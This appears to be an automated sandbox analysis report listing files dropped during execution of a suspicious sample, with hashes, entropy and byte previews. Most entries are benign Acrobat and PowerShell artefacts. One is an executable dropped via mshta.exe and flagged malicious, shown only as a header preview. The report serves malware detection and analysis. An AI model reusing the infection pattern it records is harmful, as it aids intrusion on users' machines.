                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:PostScript document text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1233
                                                                                                              Entropy (8bit):5.233980037532449
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                              Malicious:false
                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:PostScript document text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1233
                                                                                                              Entropy (8bit):5.233980037532449
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                              Malicious:false
                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:PostScript document text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):10880
                                                                                                              Entropy (8bit):5.214360287289079
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                              Malicious:false
                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:PostScript document text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):10880
                                                                                                              Entropy (8bit):5.214360287289079
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                              Malicious:false
                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):0.8112781244591328
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:e:e
                                                                                                              MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                              SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                              SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                              SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                              Malicious:false
                                                                                                              Preview:....
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:JSON data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2145
                                                                                                              Entropy (8bit):5.065913000842341
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:YZ2sL0/EY0bMSlMtCM5mMOpiMAW0MretMSMmkaMY:xv/SYtt55V6AWLre6JmkhY
                                                                                                              MD5:E197BD5220320FBF04D3BC4C93AB7D7A
                                                                                                              SHA1:147707DE3816E18A0386E62911B5A2BF9B2A47BB
                                                                                                              SHA-256:728DAF3EAE930E9672A453682B96311D66480BBDBCB6B6F4DB50B21E98FA55FF
                                                                                                              SHA-512:79A0AEEE71D606CE7C56A22A6791AD836C5E7E0DFA89FB6BD0DF32B5B23C6614B349A59EAAE5C822A4C5D5A186CA2AFE0C990E84B62A12A32F1E9388A5979C6B
                                                                                                              Malicious:false
                                                                                                              Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1734336860000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"23c88c8acf166d9fda5ae4d83df3db72","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696420889000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d5fa85f4cf271b5fa75367efd1b392fa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696420884000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"7c2ad79e375e3ea39f82a389e8a5841f","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696420882000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c3af48ba3dee086edbbf20dff46c7ee0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696333862000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7101e009d8bf8920d0a3dd3f5dc75ebc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696333862000},{"id":"DC_Reader_Edit_LHP_Banner"
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                                                                                              Category:dropped
                                                                                                              Size (bytes):12288
                                                                                                              Entropy (8bit):1.1890426634811664
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:TGufl2GL7msEHUUUUUUUUcSvR9H9vxFGiDIAEkGVvpe:lNVmswUUUUUUUUc+FGSIti
                                                                                                              MD5:CC6D6047910852C41D84CF8F53FD5902
                                                                                                              SHA1:209949A134B2E6E552F0EB37B21D3C74B1183D8A
                                                                                                              SHA-256:F6569862AB26F98F1D0FF538640BD9E59B642D0FF752F512D488FABA997A456A
                                                                                                              SHA-512:CCFBB6DA838285E9B81653CBDCDE06EB882A07F00441808C73C79C04586574EEC479AEC11838E2F6A64DD73192B69F8658670383339B69BE51D0A60FBDF4622F
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:SQLite Rollback Journal
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8720
                                                                                                              Entropy (8bit):1.605224364666484
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:7M/KUUUUUUUUUUOvR9H9vxFGiDIAEkGVvnWqFl2GL7msL:75UUUUUUUUUUyFGSItIKVmsL
                                                                                                              MD5:151AD2558D80E64327C35D46752E4A58
                                                                                                              SHA1:59AF65EEA49EA4FA14706E6465A7C5B6B0715737
                                                                                                              SHA-256:C9FCAAF7086D8692D2AA85460EF8AC3F05A3343531BDFD0B3850C31F1E2C640C
                                                                                                              SHA-512:F13D682B74AFDDE3CADA1BBCBA17ACD6C18F3BA8F1F5362BB239E2ADB6DAC6C45CA2C4E750CEDEF0D1429B64D605EF6E998A1627C9F37EFE3C52680339F8D83F
                                                                                                              Malicious:false
                                                                                                              Preview:.... .c.....2Dy.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):66726
                                                                                                              Entropy (8bit):5.392739213842091
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:RNOpblrU6TBH44ADKZEg/4WJdSQDSrUfnvulthBeBEFSYyu:6a6TZ44ADE/7JdSQDSrW3EEK
                                                                                                              MD5:E714FB208409C184A4D03D4CEF5D9D9E
                                                                                                              SHA1:70544BD93579EB112EBE74286F3014D2011E8798
                                                                                                              SHA-256:DD56FA40EEB3230118CFAD14E685F35E3B10FF078BB85C93B0AFCB8D837774CD
                                                                                                              SHA-512:8BFE9C579B356A1AEE15B86719116CC5B6EC14EEA2D759EF805F4E8789F24A85794255CBE88788D7EEC143FDEC0BE2BF1087B3EED0ED015E0A41EEB364B0C838
                                                                                                              Malicious:false
                                                                                                              Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                                                                                                              Process:C:\Windows\System32\mshta.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):462414
                                                                                                              Entropy (8bit):6.342154631798131
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:e+WoC/IdkUPq5l+WoC/IdkUPq50+WoC/IdkUPq5v+WoC/IdkUPq5u+WoC/IdkUPO:epOkVpOkkpOk/pOkepOk
                                                                                                              MD5:ACE6B795AA18D8C38686036C49A2C7BA
                                                                                                              SHA1:F356E2A4FE2199D14B78609E5FC4D9419E7CE947
                                                                                                              SHA-256:CB3B56BC9D52514A9891C353CCDF5DEFFEA701F487AC71B5CC48B9EC6DFE1EFA
                                                                                                              SHA-512:E1B7C71E7233207B03FF0ED31302D635BB962CD52EEA3DF724E7AD056CEB37AE67E2E1314FFDDA664B27FE872E673160BA1FF492F6D177DD3E592D8432FBF976
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 24%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R...3...3...3...C...3...C...3...C...3...C...3...3...2...C...3...Cw..3...C...3..Rich.3..........................PE..L...........................T....................@.................................{.....@...... ..........................P$..,....`..(....................p.......1..T............................................ ..L.......@....................text...X........................... ..`.data...............................@....idata..D)... ...*..................@..@.didat.......P.......4..............@....rsrc...(....`.......6..............@..@.reloc.......p.......B..............@..B................................................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                              Malicious:false
                                                                                                              Preview:@...e...........................................................
                                                                                                              Process:C:\Users\user\AppData\Roaming\UltraChrome\pyexec.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1031868
                                                                                                              Entropy (8bit):7.5498940695183485
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:HMlEWjBz0tyr0Tqv7H0jj1mpOd+uge3CtyXfMORBA7joJKR6vi5zg:cEyGTE7H0jjaOYuP3CtyXfMORBA7joJl
                                                                                                              MD5:217D4939521DA98B3C5E7DA9A27D06A1
                                                                                                              SHA1:753257F723DE8415FB6E23F120852370A18C5747
                                                                                                              SHA-256:42FB6AF1B65328E62ED5B63BC1151EC87106A73BB8AAC40CAA43C3D16D71339B
                                                                                                              SHA-512:832A483216506B8C20397F773B1214A87A1EB17383BF3DA88747CBCE5947B58C2E377B8044B7353AD3202F3A6285B4DF2C6FF7786E8CC7BA1FE54B063646C45E
                                                                                                              Malicious:false
                                                                                                              Preview:.Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..............#...7...8...&...%...q...$...>...<...%...$..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q...>...%...8...)..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q...>...0...?...?...Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..............>...%......0...>...Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q...c..d..f..Q..Q..Q..Q..Q..Q..Q..Q..Q..Q..
                                                                                                              Process:C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):988
                                                                                                              Entropy (8bit):5.5006012665764645
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:bTbAIeLLzvbCxN3GWgcP2wwAWgcP2MDWgcP2Uf4aM4DWgcP2xWgcP2/1:jxYONT3O3a3hfdS313S1
                                                                                                              MD5:B1037CB00DBFDCCE68A3FD43A01DD0D1
                                                                                                              SHA1:D6FECEBFDB9763D389DEEBDF493579D80603A66C
                                                                                                              SHA-256:9C11E5039B0FC0DDD6B82D200343B69D6498C68DF7647B97C0CE9F188A333E62
                                                                                                              SHA-512:722DB848D10BAC4AE64E694693A07093A5C8AC33E5CF59AA3A8DD9C9B0413238433C5385C991DED0ACCB144416BAD6A151633EA8DA4D5D4AFCAAF2FCB6327A42
                                                                                                              Malicious:false
                                                                                                              Preview:[11EC:06C4][2024-12-16T03:14:25]i001: Burn v3.11.1.2318, Windows v10.0 (Build 19045: Service Pack 0), path: C:\Windows\Temp\{DB4AAEB1-67D3-4D17-BEFD-97E7465C342E}\.cr\IMAKBWPY.exe..[11EC:06C4][2024-12-16T03:14:25]i009: Command Line: '-burn.clean.room=C:\Users\user\AppData\Roaming\IMAKBWPY.exe -burn.filehandle.attached=520 -burn.filehandle.self=516'..[11EC:06C4][2024-12-16T03:14:25]i000: Setting string variable 'WixBundleOriginalSource' to value 'C:\Users\user\AppData\Roaming\IMAKBWPY.exe'..[11EC:06C4][2024-12-16T03:14:25]i000: Setting string variable 'WixBundleOriginalSourceFolder' to value 'C:\Users\user\AppData\Roaming\'..[11EC:06C4][2024-12-16T03:14:25]i000: Setting string variable 'WixBundleLog' to value 'C:\Users\user\AppData\Local\Temp\Chowchow_20241216031425.log'..[11EC:06C4][2024-12-16T03:14:25]i000: Setting string variable 'WixBundleName' to value 'Chowchow'..[11EC:06C4][2024-12-16T03:14:25]i000: Setting string variable 'WixBundleManufacturer' to value 'Warp'..
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):246
                                                                                                              Entropy (8bit):3.512793808211959
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8er6gble:Qw946cPbiOxDlbYnuRKhxk
                                                                                                              MD5:B222853D2500134DF4E2CA36C325EF2E
                                                                                                              SHA1:8FE197890D4093C20A866538AD315BE0EA1CA3BE
                                                                                                              SHA-256:7E8A2F8BCB2FC60B3D6ADEBFB9F055E425CEF23037BE6801B27F3ED1FF27FC9D
                                                                                                              SHA-512:8812B76EA2858C2669A377031ABC24DF186E1D9A1E5D55F7557F02DE90359D3777BB18FE2B53D2F31EBA04A497DEFC3E6BE960C0E2168FCF318B4494B6C1E594
                                                                                                              Malicious:false
                                                                                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.6./.1.2./.2.0.2.4. . .0.3.:.1.4.:.2.6. .=.=.=.....
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                              File Type:ASCII text, with very long lines (393)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):16525
                                                                                                              Entropy (8bit):5.345946398610936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                                                                                              MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                                                                                              SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                                                                                              SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
